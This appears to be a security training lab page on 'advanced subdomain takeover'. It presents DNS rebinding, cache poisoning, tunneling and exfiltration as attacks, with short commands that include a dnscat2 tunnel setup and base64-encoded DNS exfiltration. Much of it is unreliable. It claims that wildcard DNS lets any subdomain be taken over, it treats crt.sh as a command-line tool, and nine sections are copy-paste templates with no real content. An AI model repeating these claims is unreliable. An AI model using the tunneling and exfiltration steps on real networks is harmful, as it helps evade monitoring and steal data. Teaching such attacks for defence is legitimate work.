Lab 4: Advanced Subdomain Takeover

Advanced subdomain takeover vulnerabilities

Difficulty: High

Lab Overview

This lab demonstrates advanced subdomain takeover vulnerabilities including wildcard takeovers, DNS rebinding, subdomain enumeration, and other sophisticated techniques.

Objective: Understand how advanced subdomain takeover attacks work and how to exploit them.

Advanced Takeover Scanner
Check Advanced Techniques

This tool checks for advanced subdomain takeover techniques:

Advanced Takeover Tester
⚠️ Advanced Takeover Warning

This lab demonstrates advanced subdomain takeover vulnerabilities:

  • Wildcard Takeover - Wildcard subdomain takeover
  • DNS Rebinding - DNS rebinding attacks
  • Subdomain Enumeration - Advanced enumeration
  • DNS Poisoning - DNS poisoning attacks
Advanced Techniques

Available advanced techniques:

  • Wildcard Takeover - Wildcard subdomain takeover
  • DNS Rebinding - DNS rebinding attack
  • Subdomain Enumeration - Subdomain enumeration
  • DNS Poisoning - DNS poisoning
Advanced Techniques
Available Advanced Techniques:
Wildcard Subdomain Takeover
wildcard_takeover
High Risk
DNS Rebinding Attack
dns_rebinding
High Risk
Subdomain Enumeration
subdomain_enumeration
High Risk
DNS Poisoning
dns_poisoning
High Risk
DNS Tunneling
dns_tunneling
High Risk
DNS Exfiltration
dns_exfiltration
High Risk
Advanced Subdomain Takeover Techniques
Wildcard Takeover
# Wildcard subdomain takeover # Check for wildcard DNS dig *.example.com # If wildcard exists, any subdomain # can be taken over
DNS Rebinding
# DNS rebinding attack # 1. Set up malicious DNS server # 2. Point subdomain to malicious IP # 3. Serve malicious content # 4. Bypass same-origin policy
Subdomain Enumeration
# Advanced subdomain enumeration # - Dictionary attacks # - Certificate transparency # - DNS bruteforcing # - Search engine dorking
DNS Poisoning
# DNS poisoning attack # 1. Poison DNS cache # 2. Point subdomain to malicious IP # 3. Serve malicious content # 4. Capture credentials
DNS Tunneling
# DNS tunneling # 1. Set up DNS tunnel # 2. Exfiltrate data via DNS # 3. Bypass network restrictions # 4. Maintain persistence
DNS Exfiltration
# DNS exfiltration # 1. Encode data in DNS queries # 2. Send to malicious DNS server # 3. Exfiltrate sensitive data # 4. Bypass network monitoring
Vulnerability Details
  • Type: Advanced Subdomain Takeover
  • Severity: Critical
  • Method: Multiple advanced techniques
  • Issue: Complex vulnerabilities
Attack Vectors
  • Wildcard Takeover: Wildcard subdomain takeover
  • DNS Rebinding: DNS rebinding attacks
  • Subdomain Enumeration: Advanced enumeration
  • DNS Poisoning: DNS poisoning attacks
Advanced Subdomain Takeover Examples

Use these techniques to exploit advanced subdomain takeover vulnerabilities:

1. Wildcard Subdomain Takeover:
# Check for wildcard DNS dig *.example.com nslookup *.example.com # If wildcard exists: # 1. Any subdomain can be taken over # 2. Use random subdomains # 3. Deploy malicious content # 4. Verify takeover # Example: # Check if *.example.com resolves # If yes, any subdomain like: # - random123.example.com # - test.example.com # - admin.example.com # Can be taken over
2. DNS Rebinding Attack:
# DNS rebinding attack # 1. Set up malicious DNS server # 2. Point subdomain to malicious IP # 3. Serve malicious content # 4. Bypass same-origin policy # Example: # Set up DNS server that returns: # - First query: legitimate IP # - Second query: malicious IP # This bypasses same-origin policy # Malicious DNS server: # Query 1: subdomain.example.com -> 1.2.3.4 # Query 2: subdomain.example.com -> 5.6.7.8
3. Advanced Subdomain Enumeration:
# Advanced subdomain enumeration # Dictionary attacks subfinder -d example.com -w wordlist.txt # Certificate transparency crt.sh -q example.com # DNS bruteforcing dnsrecon -d example.com -t brt # Search engine dorking site:example.com inurl:subdomain # Use tools like: # - subfinder # - amass # - assetfinder # - findomain # - crt.sh
4. DNS Poisoning Attack:
# DNS poisoning attack # 1. Poison DNS cache # 2. Point subdomain to malicious IP # 3. Serve malicious content # 4. Capture credentials # Example: # Poison DNS cache to point: # subdomain.example.com -> 1.2.3.4 # Serve phishing page at 1.2.3.4 # Capture user credentials
5. DNS Tunneling:
# DNS tunneling # 1. Set up DNS tunnel # 2. Exfiltrate data via DNS # 3. Bypass network restrictions # 4. Maintain persistence # Example: # Use tools like: # - dns2tcp # - iodine # - dnscat2 # Set up tunnel: dnscat2 server --dns domain=example.com dnscat2 client --dns domain=example.com
6. DNS Exfiltration:
# DNS exfiltration # 1. Encode data in DNS queries # 2. Send to malicious DNS server # 3. Exfiltrate sensitive data # 4. Bypass network monitoring # Example: # Encode data in subdomain: # data.example.com # sensitive.example.com # credentials.example.com # Use base64 encoding: # echo "sensitive data" | base64 # Send as subdomain query
7. Subdomain Takeover via CDN:
# CDN subdomain takeover # 1. Check CDN configuration # 2. Find misconfigured CDN # 3. Take over CDN subdomain # 4. Serve malicious content # Example: # Check Cloudflare configuration # Find misconfigured CDN # Take over CDN subdomain # Serve malicious content
8. Subdomain Takeover via Load Balancer:
# Load balancer takeover # 1. Check load balancer config # 2. Find misconfigured LB # 3. Take over LB subdomain # 4. Serve malicious content # Example: # Check AWS ALB configuration # Find misconfigured load balancer # Take over LB subdomain # Serve malicious content
9. Subdomain Takeover via API Gateway:
# API Gateway takeover # 1. Check API Gateway config # 2. Find misconfigured gateway # 3. Take over gateway subdomain # 4. Serve malicious content # Example: # Check AWS API Gateway # Find misconfigured gateway # Take over gateway subdomain # Serve malicious content
10. Subdomain Takeover via WAF:
# WAF subdomain takeover # 1. Check WAF configuration # 2. Find misconfigured WAF # 3. Take over WAF subdomain # 4. Serve malicious content # Example: # Check Cloudflare WAF # Find misconfigured WAF # Take over WAF subdomain # Serve malicious content
11. Subdomain Takeover via DDoS Protection:
# DDoS protection takeover # 1. Check DDoS protection config # 2. Find misconfigured protection # 3. Take over protection subdomain # 4. Serve malicious content # Example: # Check AWS Shield # Find misconfigured protection # Take over protection subdomain # Serve malicious content
12. Subdomain Takeover via SSL Certificate:
# SSL certificate takeover # 1. Check SSL certificate # 2. Find misconfigured cert # 3. Take over cert subdomain # 4. Serve malicious content # Example: # Check SSL certificate # Find misconfigured cert # Take over cert subdomain # Serve malicious content
13. Subdomain Takeover via Email Service:
# Email service takeover # 1. Check email service config # 2. Find misconfigured service # 3. Take over service subdomain # 4. Serve malicious content # Example: # Check SendGrid configuration # Find misconfigured service # Take over service subdomain # Serve malicious content
14. Subdomain Takeover via Analytics:
# Analytics takeover # 1. Check analytics config # 2. Find misconfigured analytics # 3. Take over analytics subdomain # 4. Serve malicious content # Example: # Check Google Analytics # Find misconfigured analytics # Take over analytics subdomain # Serve malicious content
15. Subdomain Takeover via Monitoring:
# Monitoring takeover # 1. Check monitoring config # 2. Find misconfigured monitoring # 3. Take over monitoring subdomain # 4. Serve malicious content # Example: # Check New Relic configuration # Find misconfigured monitoring # Take over monitoring subdomain # Serve malicious content
Real-World Attack Scenarios
Mitigation Strategies
  • Implement comprehensive subdomain monitoring
  • Use secure DNS configurations and controls
  • Regular DNS security audits and assessments
  • Implement proper DNS security controls
  • Regular security testing and vulnerability assessments
  • Monitor for unusual subdomain activity
  • Implement proper subdomain validation
  • Use secure coding practices
  • Implement proper error handling
  • Educate users about security threats
  • Use multi-factor authentication
  • Implement proper logging and monitoring
  • Use advanced subdomain takeover detection tools
  • Implement proper audit trails